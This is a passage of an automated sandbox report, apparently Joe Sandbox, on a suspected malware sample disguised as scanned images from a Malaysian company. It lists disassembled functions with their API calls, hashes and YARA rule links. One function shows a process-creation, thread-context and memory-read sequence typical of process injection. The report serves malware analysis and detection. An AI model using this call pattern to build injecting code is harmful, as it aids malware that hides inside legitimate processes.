                                                        • Opcode ID: 31f19b8e32c4935767291f5fa68d881fbaaa73382f879a5b23c7d3913ada1151
                                                        • Instruction ID: c7a869097a150c27b5c2411c2a0a56d569b0fca27ecabf86e1a2b4460b3022df
                                                        • Opcode Fuzzy Hash: 31f19b8e32c4935767291f5fa68d881fbaaa73382f879a5b23c7d3913ada1151
                                                        • Instruction Fuzzy Hash: 4F224874508361CFCB24DF18D594B2ABBF1BF94300F15896DE89A8B262D731ED85CB92
                                                        Function 00A24DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: d5300e96a804ece685c4fb40ddc9328659b11fe549557ff9f11ce6677244a435
                                                        • Instruction ID: 474e1eabc92c989635d4e3a4c7923a41d08e0810adde51d077f57f714522848b
                                                        • Opcode Fuzzy Hash: d5300e96a804ece685c4fb40ddc9328659b11fe549557ff9f11ce6677244a435
                                                        • Instruction Fuzzy Hash: B6414931A041745BEF219B7CED517FE7FB6AB49300F694075EC829A286C6319D8487A1
                                                        Function 00A9DD64 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strcat.LIBCMT ref: 00A9DE37
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • _wcscpy.LIBCMT ref: 00A9DEC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1012013722-0
                                                        • Opcode ID: dfae2d5080535e42677e845b3cf72ff7485201b5f488ff314b8fbfb3108dbe5e
                                                        • Instruction ID: 03a861f59ba4a9f293fc232c7cc3390d7a08ec8ecfb36b944f1a3b45a102ed1d
                                                        • Opcode Fuzzy Hash: dfae2d5080535e42677e845b3cf72ff7485201b5f488ff314b8fbfb3108dbe5e
                                                        • Instruction Fuzzy Hash: F3912935B00514DFCB18DF28D6829A9BBF1EF59314B55846AF85A8F362DB31ED81CB80
                                                        Function 00A2492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00A24992
                                                          • Part of subcall function 00A435AC: __lock.LIBCMT ref: 00A435B2
                                                          • Part of subcall function 00A435AC: DecodePointer.KERNEL32(00000001,?,00A249A7,00A781BC), ref: 00A435BE
                                                          • Part of subcall function 00A435AC: EncodePointer.KERNEL32(?,?,00A249A7,00A781BC), ref: 00A435C9
                                                          • Part of subcall function 00A24A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A24A73
                                                          • Part of subcall function 00A24A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A24A88
                                                          • Part of subcall function 00A23B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A23B7A
                                                          • Part of subcall function 00A23B4C: IsDebuggerPresent.KERNEL32 ref: 00A23B8C
                                                          • Part of subcall function 00A23B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE62F8,00AE62E0,?,?), ref: 00A23BFD
                                                          • Part of subcall function 00A23B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00A23C81
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A249D2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 5c88e47996fba5c6a8e96480dbae690a937c74c45045cd620861e3c4ee115c09
                                                        • Instruction ID: be92a774a35b547806f363406c1f80b6eb713f7b65133a80ba4c2ba06224f76e
                                                        • Opcode Fuzzy Hash: 5c88e47996fba5c6a8e96480dbae690a937c74c45045cd620861e3c4ee115c09
                                                        • Instruction Fuzzy Hash: C11190B19043619FC700DFA8ED4594AFFF8EB99750F00492EF5458B2B1DB709946CB92
                                                        Function 00A40FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A4594C: __FF_MSGBANNER.LIBCMT ref: 00A45963
                                                          • Part of subcall function 00A4594C: __NMSG_WRITE.LIBCMT ref: 00A4596A
                                                          • Part of subcall function 00A4594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00A41013,?), ref: 00A4598F
                                                        • std::exception::exception.LIBCMT ref: 00A4102C
                                                        • __CxxThrowException@8.LIBCMT ref: 00A41041
                                                          • Part of subcall function 00A487DB: RaiseException.KERNEL32(?,?,?,00ADBAF8,00000000,?,?,?,?,00A41046,?,00ADBAF8,?,00000001), ref: 00A48830
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: f3eac34e40b2206154f06ce0bbb55fa7905468859e97c4baefd46733535a932c
                                                        • Instruction ID: 6b966fda4d1659748a98aa828e0af70d44eaf29ef5e98eebf3552a61fba8784f
                                                        • Opcode Fuzzy Hash: f3eac34e40b2206154f06ce0bbb55fa7905468859e97c4baefd46733535a932c
                                                        • Instruction Fuzzy Hash: 09F0C83D54021DA7CB20BB68ED15ADF7BAC9F81350F100426F80496692EFB18AC092E5
                                                        Function 00A4582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 53945a40789775aa97a5dbee864382b101a4db04db63e7335aa41901081bb878
                                                        • Instruction ID: b81448e91477e5f33ddb0f87d12c752a03b4f474750efe0b0b94bf0bce7784a0
                                                        • Opcode Fuzzy Hash: 53945a40789775aa97a5dbee864382b101a4db04db63e7335aa41901081bb878
                                                        • Instruction Fuzzy Hash: BF018479C00608EBCF22AF799E0659E7B61AFC5760F148215B8145A1A2DF358A11EB91
                                                        Function 00A455D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        • __lock_file.LIBCMT ref: 00A4561B
                                                          • Part of subcall function 00A46E4E: __lock.LIBCMT ref: 00A46E71
                                                        • __fclose_nolock.LIBCMT ref: 00A45626
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 72bb9b75032e9c7f3f0f0c78fb85fce557e74e83faee420d64e6c2d555e12528
                                                        • Instruction ID: bd277960ca180cec8d3bc9a5fc8f77e41519e2e7fc2aa087a5bbc91c9fab32ee
                                                        • Opcode Fuzzy Hash: 72bb9b75032e9c7f3f0f0c78fb85fce557e74e83faee420d64e6c2d555e12528
                                                        • Instruction Fuzzy Hash: 48F0B479C01A049FDB20BF759A0276EB7E16FC1B34F6A8209A415AB1C3CF7C89029B55
                                                        Function 0169129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01691A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01691AF1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01691B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction ID: a61dc899211f999e5e9ac67e74df09fbb7ebc33feaeba6b723e4735eaa3990c1
                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction Fuzzy Hash: EF12CD24E24658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CB5A
                                                        Function 00A600D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 5eccdfab4a136f41a15f9f12361aac362e5b3292817913a4fd606d514f071c47
                                                        • Instruction ID: a7259a81bf32b66a45770074f7166c26651dcb64eefdc0b120c06b0c01d35031
                                                        • Opcode Fuzzy Hash: 5eccdfab4a136f41a15f9f12361aac362e5b3292817913a4fd606d514f071c47
                                                        • Instruction Fuzzy Hash: 8F41F574508351CFDB24DF18C584B1ABBF0BF95318F1989ACE8898B762C332E885CB52
                                                        Function 00A24F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A24D13: FreeLibrary.KERNEL32(00000000,?), ref: 00A24D4D
                                                          • Part of subcall function 00A4548B: __wfsopen.LIBCMT ref: 00A45496
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24F6F
                                                          • Part of subcall function 00A24CC8: FreeLibrary.KERNEL32(00000000), ref: 00A24D02
                                                          • Part of subcall function 00A24DD0: _memmove.LIBCMT ref: 00A24E1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 0d77b15ea33326f9cf83164d1042f91960fbcbf3f3bb6225e83cf2da85feaf4f
                                                        • Instruction ID: 7e65093131e3ac9e666a0385630ee10f52af3ddc8e7e33c9ad4303069549fa57
                                                        • Opcode Fuzzy Hash: 0d77b15ea33326f9cf83164d1042f91960fbcbf3f3bb6225e83cf2da85feaf4f
                                                        • Instruction Fuzzy Hash: FD11EB32604725AFCB14FF78EE02BAE77A59F88701F108439F5419A1C1DA719A059750
                                                        Function 00A601AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: b125bdef4d49f9b1c9dfc4e20efc2a4c5ac9fb8c32c97cf52522fc9fbee46a53
                                                        • Instruction ID: 62b3ee8204a8f206734298dfb58fd3a86f6d813904c03e208aec239598e755b1
                                                        • Opcode Fuzzy Hash: b125bdef4d49f9b1c9dfc4e20efc2a4c5ac9fb8c32c97cf52522fc9fbee46a53
                                                        • Instruction Fuzzy Hash: 3B211374508361CFCB24DF68D544A1BBBF0BF89314F058968E88A47761D731E885CB52
                                                        Function 00A7FC4D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 06786a75e538d6049ff635853d8990689110bddc0b31655e3336a3db740df019
                                                        • Instruction ID: 2a7d5ca59d1b34d0fe2b28fbed730f3a0357a75bfca3d83a1014701baac2b5d4
                                                        • Opcode Fuzzy Hash: 06786a75e538d6049ff635853d8990689110bddc0b31655e3336a3db740df019
                                                        • Instruction Fuzzy Hash: D9018176200225ABCB28DF2DDD9196BB7A9EFC5364714843EF90ACB245E631E901C7A0
                                                        Function 00A44A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 00A44AD6
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: a9e17750985cfff999d8635604d7a72ab1713cd7eb80aea05acba7da042c0c9b
                                                        • Instruction ID: dd17688704e9bbf22dccc51b11c7d2066f2b23028d01749c40784ca87ade5977
                                                        • Opcode Fuzzy Hash: a9e17750985cfff999d8635604d7a72ab1713cd7eb80aea05acba7da042c0c9b
                                                        • Instruction Fuzzy Hash: 31F0C239940209EFDF61BF74CD0639F36A1AF88365F148525F424AA1D2CB7C8A51EF51
                                                        Function 00A24FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24FDE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: e44313596461d787066b6081d56c21ad5c84d10b4c27a421771beab83fc51167
                                                        • Instruction ID: 9424987dd618282133848110998a7a7cd409f5a55159bd15d7fad6e3d9021a1a
                                                        • Opcode Fuzzy Hash: e44313596461d787066b6081d56c21ad5c84d10b4c27a421771beab83fc51167
                                                        • Instruction Fuzzy Hash: 38F03971509B22CFCB349F68E594822BBF1BF487293208A3EE1D682A10C732A844DF40
                                                        Function 00A409D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A409F4
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: a6dd25ff21c1ded91c7964969f09927beef717b0df268bbf3375d07fed993b29
                                                        • Instruction ID: b50897abec39dc646a4b168a089fc3165eb88721fce0e98a55974b365c1d7255
                                                        • Opcode Fuzzy Hash: a6dd25ff21c1ded91c7964969f09927beef717b0df268bbf3375d07fed993b29
                                                        • Instruction Fuzzy Hash: 89E07D329002285BC720D29C9C05FFA73ECDFC8390F0001B1FC0CC3204E9709C818690
                                                        Function 00A89129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                        • Instruction ID: 2814e25f9456d4dacb14fd9c593fb1347a42a0e53b42928cd2911f288487b316
                                                        • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                        • Instruction Fuzzy Hash: DFE09AB0618B009FEB789B24D814BE373E0AB06315F04091CF2AA83342EF63B8419B59
                                                        Function 00A4548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: d118cffa3fab0346b27ccaefd6086e0f76ced4844b3f8899897d1bb6750584f1
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: DBB0927A84020C77DE012E92EC02A593B1A9B80678F808020FB0C1C162A6B3EAA09689
                                                        Function 00A40E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
